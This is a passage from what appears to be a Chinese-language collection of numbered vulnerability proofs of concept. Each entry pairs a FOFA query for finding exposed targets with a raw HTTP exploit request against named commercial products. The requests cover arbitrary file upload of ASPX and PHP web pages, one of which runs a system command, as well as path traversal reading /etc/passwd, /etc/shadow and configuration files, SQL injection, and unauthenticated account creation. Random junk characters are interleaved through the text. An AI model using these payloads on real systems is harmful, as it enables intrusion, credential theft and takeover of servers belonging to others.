User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0$ d' Q  D3 a* P+ B9 F9 q! Q
Connection: close* `) w6 Z$ X3 q. |' g
Accept: */*% s% l( K: J1 c' F( P( D+ W
Accept-Language: en
) ], n  s' o- v0 k: @; ~/ u& GAccept-Encoding: gzip. j' L( P6 f) L" \- c4 j% T& R
" w" S8 e" Z8 i* p& O
% M- j' T% g% |
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 H# i. D& o; k4 q
FOFA:body="/KT_Css/qd_defaul.css"% }$ i. G8 }+ P1 f' y
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密7 Z% ~, {# T- T4 ]! x  ^
POST /Webservice.asmx HTTP/1.19 T0 W; H) d: `
Host: x.x.x.x3 W& o7 K) {) K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36" h/ ]$ L: |9 O5 k6 J( h! U! C
Connection: close9 i) A  k0 B) m
Content-Length: 445* D2 ]) o, j, B
Content-Type: text/xml
  x' B- w3 @4 l, `Accept-Encoding: gzip9 b# k( \* P1 o3 ^1 `! ^

6 f) ?8 v. d; V% Z+ s% y<?xml version="1.0" encoding="utf-8"?>
/ S/ `5 B2 R7 N8 i0 C<soap:Envelope xmlns:xsi="
* P$ |5 \- m8 z2 ]" K9 dhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
9 e8 Q# a: y  C# W' Nxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" T4 q+ H. y( n6 J
<soap:Body>
2 P7 V' A7 m4 L) l" B, |<UploadResume xmlns="http://tempuri.org/">% `5 ]. g' j' H+ y" p
<ip>1</ip>2 h0 L6 N4 r5 w2 W3 ]
<fileName>../../../../dizxdell.aspx</fileName>
" b% Q; P3 O: U. n6 G, s" ~5 J<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>* X9 `* V- c0 a
<tag>3</tag>
, A( T3 I% [- ~& }8 C: B</UploadResume>1 z: w( i0 Y: b8 e4 u" @) K+ h" Q
</soap:Body>
+ k4 t; I% k0 ?) a9 @" X7 r</soap:Envelope>2 L: i8 y( |6 j' X9 v
0 ?& s( T1 P5 o0 t+ ]1 y. v+ b
7 x5 Z1 r* I, D
http://x.x.x.x/dizxdell.aspx
, w+ Y4 a$ ~7 W0 P4 h2 Q: M9 p/ i* C- C+ y% O$ h$ P! [, w8 \* H
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传! F& d! {( m5 l' r8 d
FOFA: app="和丰山海-数字标牌"
: n" h5 @& B+ z5 V% E4 aPOST /QH.aspx HTTP/1.1
6 N4 b; z/ Q4 X, oHost: x.x.x.x% f  s: d# f, ~) x( B1 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.07 s. I& R2 x& P4 [: @5 u! n1 d- f7 s
Connection: close! h; E3 r. y) Y
Content-Length: 583
$ k' m; Y3 e* QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey+ N  v/ H6 d# H" p4 l# e7 b
Accept-Encoding: gzip' ?+ x; b8 h; T7 L+ ]+ [
( R& b/ G7 _( H
------WebKitFormBoundaryeegvclmyurlotuey
; m2 n+ q1 a3 iContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"! C; f; G+ t% y* @- Z# N
Content-Type: application/octet-stream
5 G  {7 R* G( x5 p5 N
4 y  w# }- J3 s+ k<% response.write("ujidwqfuuqjalgkvrpqy") %>' S6 R9 c) g2 x; w$ V- o7 ~( l
------WebKitFormBoundaryeegvclmyurlotuey
8 Z, a4 f. {9 a. q1 w  TContent-Disposition: form-data; name="action"* a6 `% n9 d: x9 \
+ U+ x0 r- _7 q. I6 P( r5 C
upload
8 o! F! t, ^- F( T2 O  n8 j------WebKitFormBoundaryeegvclmyurlotuey
4 i2 ^7 a) B: ~4 g( ?Content-Disposition: form-data; name="responderId"
% k; k/ ~$ L' `0 l6 v0 X1 n( r! R) ^7 @9 `; J8 w
ResourceNewResponder
6 B- L0 |9 D) h$ t------WebKitFormBoundaryeegvclmyurlotuey8 O6 I5 k5 i6 [2 ~( ~
Content-Disposition: form-data; name="remotePath": W6 M3 l) X& u  k
1 z+ |7 I  S9 x
/opt/resources4 v$ c, S7 u2 r, h# E5 ?, U( }
------WebKitFormBoundaryeegvclmyurlotuey--
+ B! c' A: A# L
5 i, _; R, ^1 `* K9 W8 R: N. J: k2 }7 r5 Z% W/ H/ U
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
3 ~7 N8 ?  S5 |/ F6 v. n! S; r
+ e$ o. W/ O5 E! E9 R163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" Y/ i9 h' {+ y- U6 D1 \+ lFOFA: icon_hash="-795291075"
4 p! g7 I% }& i% Z7 rPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
) p- V1 n* C* \* P% VHost: x.x.x.x$ P* }$ x2 g  {' r, g1 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 Q, i, W+ H; w+ g6 q3 K
Connection: close
8 a- s/ s/ g) {: ]( |$ B0 D! yContent-Length: 2930 H& o5 J7 }- P" |! h, g( Z
Accept: */*2 S( X' H' ?" A
Accept-Encoding: gzip, deflate
% X% C! R: t) k0 iAccept-Language: zh-CN,zh;q=0.9& l  S( J- t: d- W
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod) }9 V' a0 |& [5 b( x& p" _, x/ c5 p
) H0 I8 _% i$ `1 v# c
------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 e/ v# n: {, y2 L  [4 S4 VContent-Disposition: form-data; name="name"
* b0 f. V; _: x' H9 z; Z1 y# V3 q. ?; Y0 }+ U# G) b/ p
1.php4 T: G" c' T* [7 o( P5 @
------iiqvnofupvhdyrcoqyuujyetjvqgocod
( d6 g% R. G, R" ]% p* x. RContent-Disposition: form-data; name="upfile"; filename="1.php"
: k& r! x) @# R' RContent-Type: image/jpeg
. u% O8 |+ n5 b# N5 o9 E) t$ n4 X9 h/ m1 K  l3 u9 w* U
rvjhvbhwwuooyiioxega
$ p1 B* `3 O9 V( l------iiqvnofupvhdyrcoqyuujyetjvqgocod--
, x  V% l  \; S- Y9 n9 ?& C: ^9 r. n8 {* b4 O- Y

$ O8 Y; V/ d5 a6 F164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传; C- S4 D' O# V: e+ F! Y9 C3 M4 ~
FOFA: title="智慧综合管理平台登入"; P0 `2 Q4 l: B
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1' |6 L; ]+ c; M  t
Host: x.x.x.x7 _: S6 C) [& Y" H( D; }! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.08 B. C0 E6 M+ N& s+ t# R" a
Content-Length: 288+ X* D( u4 `3 F6 T. D
Accept: application/json, text/javascript, */*; q=0.01
5 f; o/ v0 G5 S0 ]5 |% S5 j/ @8 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,8 V) M0 [7 q% ], L& ]9 A
Connection: close- R& g% g1 p+ f6 v
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* Q" a7 j# n' w9 x/ p5 k& `X-Requested-With: XMLHttpRequest0 d) I  z% g+ q: q- p& s  e
Accept-Encoding: gzip
( [) U! s; e$ T
5 A7 K. ~% r2 P------dqdaieopnozbkapjacdbdthlvtlyl; j% B. X0 o1 ~& ]6 Z
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"% p& E7 ], ?! g2 q* u; A+ V
Content-Type: image/jpeg
" G4 D7 G# x8 r- e" G/ H# k5 J' }5 P+ t* `7 q
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
2 J! c3 Z, X2 t  y# {------dqdaieopnozbkapjacdbdthlvtlyl--& [( e4 E0 Q1 P
. W7 [9 J( P9 L6 N, h& F

; ?' j2 H8 V, [: L8 Ghttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
. t2 d! Y. `7 l. `1 \3 m" `7 V, ^7 Q
165. OrangeHRM 3.3.3 SQL 注入
, ?( z1 @# o' r! ?/ NCVE-2024-36428" w- [; Z$ V1 R, j9 s  R+ f
FOFA: app="OrangeHRM-产品"6 I2 @" f- U/ B  [/ z  o% m  T
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
* k2 ^  {; r. R$ f3 ^7 o
9 \+ s/ T9 P6 V7 r' Y1 D6 G* z$ N
166. 中成科信票务管理平台SeatMapHandler SQL注入/ [. D+ O' u% \: H5 N6 j2 E
FOFA:body="技术支持:北京中成科信科技发展有限公司"
" p; ^2 A9 e& r* I. ^* DPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
3 c3 u8 d" L$ Z3 `; P3 AHost:
% y% U0 I: v  Q4 wPragma: no-cache
0 m: C- [6 }' `0 {! P. YCache-Control: no-cache
  O* n' \# \6 j  b# H  ~0 t. s9 NUpgrade-Insecure-Requests: 1
9 k  q* u0 R$ m5 O& L$ }; VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
4 I1 d1 q9 ]( D4 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& d: Q$ P- w3 lAccept-Encoding: gzip, deflate& k. d4 K" z. h$ t( ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 u* ^" ?( B: n% k/ X# R( W" Q7 f
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE) g5 U( Q: F) K0 }
Connection: close
) Z- R- |# J/ x5 g( n7 e( Z( qContent-Type: application/x-www-form-urlencoded" d! T) U' h; S
Content-Length: 89/ E; X7 z7 U8 ?& d# u! B. Z

/ u  a$ j" r, i& v# N1 hMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
& H& |1 J+ _* i; N
7 M& E% q7 e; h5 b! D' x
0 I# H: g# T1 O6 Z167. 精益价值管理系统 DownLoad.aspx任意文件读取+ ^9 E1 f/ C3 r
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
- R& B1 Y6 j: ?- W" F( AGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.11 P0 w1 K3 ]8 \) R, d% P
Host:
9 ~: R' i9 _4 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 L6 [& |: R( T. }4 c0 N! a; aContent-Type: application/x-www-form-urlencoded
2 z$ @3 k) X0 ?" r# pAccept-Encoding: gzip, deflate
* b; B4 A7 ?$ PAccept: */*
! W$ T2 I: s) A6 P4 U; W: F  c) GConnection: keep-alive
4 I9 c. p) C: j( p+ D) k6 w9 p9 b; H6 V7 `

  a& f6 f6 x7 l: p% P2 h; B168. 宏景EHR OutputCode 任意文件读取' p6 `5 C1 q- p- `& w; z
FOFA:app="HJSOFT-HCM"8 ]: ?3 M1 _8 }5 _% s2 a
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
- }/ O. m/ L' ]: k% n2 G0 iHost: your-ip$ I8 Z% {( k) m: x' o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36& ]7 z) A; m  z% @* T+ D2 \
Content-Type: application/x-www-form-urlencoded
% `/ e) Z" P+ \. v* R6 `" s- yConnection: close
* K8 f, L6 m2 ?7 c* o; n3 U( `6 L4 U+ r! a  j' T. [5 A" Z

# t6 \8 K  F; r1 S( W: Q7 b  C' O, a% |# v
169. 宏景EHR downlawbase SQL注入  m. k6 X' T7 z  j& H3 f/ I" e  |
FOFA:app="HJSOFT-HCM"3 q3 `5 V. Y9 J$ b8 }
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
; q* F6 S7 _3 U3 n0 I( ~1 YHost: your-ip) u  l, |( q: [: j8 @4 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* m: U% o# W- l0 _
Accept: */** d4 j* v: L9 b% R; v$ q
Accept-Encoding: gzip, deflate
  v2 G* `; e' }9 Z/ ^Connection: close  W1 U. X& V# k, ^7 o" a
) g7 E3 U+ p% S/ Z. g% l) ^
- |; B8 h. V9 s, ~) l

. }6 b: v0 l/ h$ c170. 宏景EHR DisplayExcelCustomReport 任意文件读取( j# M2 b+ a3 ~/ a( ]# A  D# V
FOFA:body="/general/sys/hjaxmanage.js"
( g3 o' w9 |; |9 rPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
. d7 ?5 n4 U3 Z, ]Host: balalanengliang* j3 }( Y  ~  }+ t; h1 m
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ H% h3 l' K9 }& {( N  @Content-Type: application/x-www-form-urlencoded- h, J0 t5 \; ^0 n; z, D
3 C3 Y7 }8 e, [
filename=../webapps/ROOT/WEB-INF/web.xml, a, i9 ^; r5 ~
# p7 C$ m# F$ t7 ?

7 O9 ^5 v- W/ {171. 通天星CMSV6车载定位监控平台 SQL注入
% G4 u! t4 }8 b: hFOFA:body="/808gps/"$ j, ?) q; |; b& r- l; F% K
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
7 B" C) b4 n7 `/ T4 d& z' E" {0 KHost: your-ip
5 O1 [+ S) s( `" g; WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. v3 K& T4 O( r, C) FAccept: */*& y4 p# c1 ~4 t( B- t8 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  V; \% F) H. aAccept-Encoding: gzip, deflate% S; {; [( X9 q* \9 l+ v1 d
Connection: close
$ _: J  s8 S; e9 l# z5 l3 P2 R& Z0 ], n0 J8 L* k" b

. u5 [3 P( k! Y' F
  v2 @( u7 s7 ^; K* y172. DT-高清车牌识别摄像机任意文件读取4 s, }1 R" I3 ~6 s4 [$ Q" `2 @& X. W
FOFA:app="DT-高清车牌识别摄像机"
! ^/ R8 d7 A6 j, n0 U/ ?: `+ DGET /../../../../etc/passwd HTTP/1.1) M- G, a5 d2 t
Host: your-ip
6 {" g  S+ [2 W" l$ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 n( V3 e4 K( }! `, ~8 H
Accept-Encoding: gzip, deflate
) v. ^/ I3 q) Q1 \. KAccept: */*
& n" T8 a7 y; q8 qConnection: keep-alive
% a: ]( p( r) N5 c: ?2 z* W( F; i/ J# I
: f0 i5 G# Q9 b( P! {8 V# N2 d7 o
2 R8 c  W. F3 B2 h0 U3 C* B
173. Check Point 安全网关任意文件读取* d4 i* Y* |. i' a
CVE-2024-24919. C6 g( a2 k8 a5 {" F
FOFA:app="Check_Point-SSL-Network-Extender"$ A! r& \0 J4 K' b4 T6 [0 K4 e
POST /clients/MyCRL HTTP/1.1
2 E, c- ]% u& X. Y9 UHost: your-ip3 D9 V7 b. @) A: u7 \
Content-Type: application/x-www-form-urlencoded
* O' n# C+ v6 m' t) u3 j) [; t$ c7 j* N/ I. F: g) S* V
aCSHELL/../../../../../../../etc/shadow$ m5 F' \: U; _9 C9 i
! @! I( y" c& F* c% E  C

! |6 U8 y8 B! T
8 M2 X" ]( y5 q174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 d  u  P9 E) N
FOFA:app="金和网络-金和OA"+ s, m2 w5 A& {+ h
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.11 t# n7 K) W! }8 @- x0 k
Host: your-ip
0 [6 v3 b' U+ E5 D/ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ l, q2 S* y( d3 w* zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) S7 o( f* [6 cAccept-Encoding: gzip, deflate, br, l7 z, q* H, T2 ?  i3 }! t+ L! s
Accept-Language: zh-CN,zh;q=0.9
( \* \/ c" K) b+ AConnection: close
; G8 A( S7 [* V  }* e1 ?( g  n' m& U, [0 z: @

5 R! O( T& R) g# o* U1 h* ^8 _; x) }' ?4 b( K
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& R' E8 c* A  Y$ w3 C. E3 T5 r
FOFA:app="金和网络-金和OA"3 E, r$ b5 b7 D4 ]+ q
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 [( N0 H" e% X& U! j6 ]Host:
( a; g! m0 K, }% m" P$ c& eUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 ^# }2 m) i& n/ \6 g& D9 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! A$ C/ X% U0 w7 Q$ t( X! {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. [7 r+ m9 J6 C. M$ y; H
Accept-Encoding: gzip, deflate
# P. s0 H- A* h1 H( ^/ EConnection: close# G! y* z' }" e$ I2 Q
Upgrade-Insecure-Requests: 1
! d) `( K& w9 e' P; r
9 @6 X# x: `/ P; Y& H: a& V3 h+ ~2 ]3 k
176. 电信网关配置管理系统 rewrite.php 文件上传
+ F+ |* p& M6 AFOFA:body="img/login_bg3.png" && body="系统登录"; ^, `" D# [+ {, N0 P8 x
POST /manager/teletext/material/rewrite.php HTTP/1.1& p! d" L% O  _) g) a! Z
Host: your-ip
' D; d9 w6 J, K, Q' f& n) M6 _( oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
! K) J5 [! ?8 B* O6 _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT  v2 n3 }; j+ v) w) f7 A
Connection: close
$ q% V6 O" W3 ]& R/ a# h
8 a8 u" C) U9 }2 g3 N------WebKitFormBoundaryOKldnDPT
0 [8 s1 Z, I5 rContent-Disposition: form-data; name="tmp_name"; filename="test.php"6 Y  ?7 h0 G# Q/ M. d
Content-Type: image/png9 O1 ~6 q* P7 f. h" J( t. b9 ^5 e

% C  j& M+ O' i' [" X<?php system("cat /etc/passwd");unlink(__FILE__);?>
  `: R# _4 f% w6 ^" e" u/ ^, G& v------WebKitFormBoundaryOKldnDPT0 J. s5 v0 Y% `" v% {6 P& O6 d
Content-Disposition: form-data; name="uploadtime"& M5 a) K) r3 g
3 \  A' R+ \+ h/ _; |
' w. S, [! b- o& [5 i0 d0 o
------WebKitFormBoundaryOKldnDPT--
% x6 u6 `8 N) G- i. c* P) }) Y. S+ [( @7 i& d& w

) z. H) r- H$ {( Q) m6 \0 Z- F; M+ e( ?# I
177. H3C路由器敏感信息泄露0 O  _: b+ Z% H3 }0 A+ q
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg) T! C) a0 ^8 R: A6 t" ~! B
/userLogin.asp/../actionpolicy_status/../M60.cfg
+ v- ~6 t& M$ V1 `: s0 s1 J/userLogin.asp/../actionpolicy_status/../GR8300.cfg4 V2 G$ B: M' F6 ~: P6 U! ~9 L! e6 N/ z" @
/userLogin.asp/../actionpolicy_status/../GR5200.cfg% ^" X! _8 f" F; x( h' I( d
/userLogin.asp/../actionpolicy_status/../GR3200.cfg+ E5 B  e3 r) ]4 ^
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
% ^* h% f* p/ e* h0 ~/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
+ Y; z/ ]$ S2 R" k' V/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg8 T. `: l& D$ g. @% k
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg2 e/ a8 h2 y% ]. O+ i
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg/ L" B5 F7 i* Z) A: I- f. n: k6 k
/userLogin.asp/../actionpolicy_status/../ER5200.cfg9 x+ [# U+ n* C. }: `; n. B7 w
/userLogin.asp/../actionpolicy_status/../ER5100.cfg9 d, k( ?0 q' }7 h. f8 j- ]
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 b! V- x+ I0 I0 [- P. ?  K9 ~
/userLogin.asp/../actionpolicy_status/../ER3260.cfg; E" X; n+ {; q
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
+ X/ Z1 j+ K/ g0 w% B+ f/userLogin.asp/../actionpolicy_status/../ER3200.cfg  q* [: C3 Y+ I+ A* s
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
- D7 c4 }- T* b( }/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
2 v& h# S3 k0 n' t) k: @/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg: k4 m- X5 Z; ]$ Z, M
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
% d' h6 l$ N) E& k) ]1 ?/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg6 ]4 U3 K' ^3 a1 O# F  e  n, n( h
0 h* \  e3 e* K2 L4 d# a

' H; H* @) Q, B- m3 l178. H3C校园网自助服务系统-flexfileupload-任意文件上传5 E' _( }* r7 u; w( f8 W" `
FOFA:header="/selfservice"
$ F8 ^5 o3 \% I2 \POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
) B& Q1 |2 |2 w9 g* H/ ~) o* }" mHost:7 c8 `& Q; t  V% J9 B7 {9 Z6 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: V2 ]' B! B: \
Content-Length: 2525 [1 Q1 j) M9 q; F" x
Accept-Encoding: gzip, deflate
4 z% u% \, [5 ?5 fConnection: close; _9 c) t9 A6 k1 f5 C8 F! C
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l7 W. G) H# g# w9 H
-----------------aqutkea7vvanpqy3rh2l
. Q% o$ ]7 b, A+ |+ Q2 P: qContent-Disposition: form-data; name="12234.txt"; filename="12234"
: e  G. B/ v& v! L8 mContent-Type: application/octet-stream
8 D  _  `8 D9 \+ t: fContent-Length: 255
; ]) A* y( @$ T$ U) I( z7 q$ h* w4 V' }$ R9 m
12234
; ^/ ^, u! c. N-----------------aqutkea7vvanpqy3rh2l--
8 X$ u8 [: Y8 ~4 N7 T/ i
! E( u2 J/ ?) R, O5 D# J
2 K. B9 o7 a9 a5 OGET /imc/primepush/%2e%2e/flex/12234.txt, I5 M0 M. x3 Q

6 @( B, R" s* d0 c6 o4 ?
9 ^0 E7 m5 V, Z* F2 c$ r( p179. 建文工程管理系统存在任意文件读取+ b. y& Q" [/ U- g  L
POST /Common/DownLoad2.aspx HTTP/1.1( H4 S6 i+ H- a# Q
Host: {{Hostname}}
1 g/ Y$ ?' O4 i, I3 O; VContent-Type: application/x-www-form-urlencoded  M1 M" F2 ?$ j# r( Q
User-Agent: Mozilla/5.0
  b: O6 h# \& p; j, l# S% U1 T, T- ]7 |- P
path=../log4net.config&Name=8 V2 q% M' y2 x6 l% Q% i
5 O# r3 a" u0 b5 B" d% w
( g- U3 I: E* G+ M' [- p
180. 帮管客 CRM jiliyu SQL注入* R% w2 w# h& R3 f* S$ y
FOFA:app="帮管客-CRM"
' I0 I: f+ T& ?6 _3 hGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.16 K1 ^# U1 R5 N) b+ C
Host: your-ip
, x9 h0 ^7 A' j& o5 q% A2 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. H1 x# z% S, B7 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: {7 T/ ^9 _9 x
Accept-Encoding: gzip, deflate
5 _/ W! {& g" d: f. FAccept-Language: zh-CN,zh;q=0.9) t& b+ S; k( }# z8 K
Connection: close* G4 M& ?6 m: N; w, o- x* u4 _4 T

0 q# W, o$ @/ |4 Z" Z& L
, A/ ~' `4 p, z% u. p& r) V181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入9 L9 I5 w3 M0 t$ P1 x# _0 M$ ^; B
FOFA:"PDCA/js/_publicCom.js"
" w; O4 C3 s( R1 G) B! K# O* {+ `8 uPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
8 I2 z- ]5 ^( W! m) h1 n- R; Y' J$ G4 ^: kHost: your-ip; E% g% E5 Z+ x' I0 n; E1 K, I) B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 K) m/ c$ p5 x+ U2 y" z( P2 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! i* P& t9 b$ O7 E
Accept-Encoding: gzip, deflate, br
6 ]& K3 O" G' t9 LAccept-Language: zh-CN,zh;q=0.9
5 G4 w8 G/ ^) y9 k& [6 ZConnection: close
! F5 D; A8 h# v9 ^. S3 A1 }9 z% zContent-Type: application/x-www-form-urlencoded6 N+ _1 @# {! _  u0 m' w

8 T" f" |' O! E3 _! P
- T5 b* B! r3 E% v% Z+ Z- Haction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
7 G# Y+ K9 B' `7 F$ S
: L8 K% N/ b! Q9 c' q3 Y
7 N2 @( E8 W: ^7 F4 J182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建6 d5 S* D0 K$ X! Q
FOFA:"PDCA/js/_publicCom.js"
! L1 o3 _$ i6 S: m5 w( A) w6 bPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.14 N2 C( c2 d' J5 Q9 m
Host: your-ip6 B, L8 U, l3 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
* _! {, F5 _6 Z; ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ v0 \6 c$ U4 Z4 o$ V* BAccept-Encoding: gzip, deflate, br! d0 I$ p3 t* T( |5 A$ k
Accept-Language: zh-CN,zh;q=0.9
! o+ F' \2 p" `( ?0 [" l$ xConnection: close0 d& @8 s- A; w9 e1 c5 S# l' d5 ?# v
Content-Type: application/x-www-form-urlencoded
/ H; U# T2 Y" K0 \' z
' F( \, t% S8 D) n5 |, s! ~  z
; J% b; }/ r; C3 [9 l8 R" Husername=test1234&pwd=test1234&savedays=1( d2 F1 |3 z' ]# [7 g/ `% t

% [0 x$ I3 E: M' R
5 ~+ K; |& z+ W% b9 }: s7 L183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
& ]9 Q# L) l  Y& C0 X) \$ AFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"" c% w) N% A4 p* u& S6 o1 f9 P
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.17 e" u' m& N$ T) X
Host: your-ip- @$ W$ \1 J, n
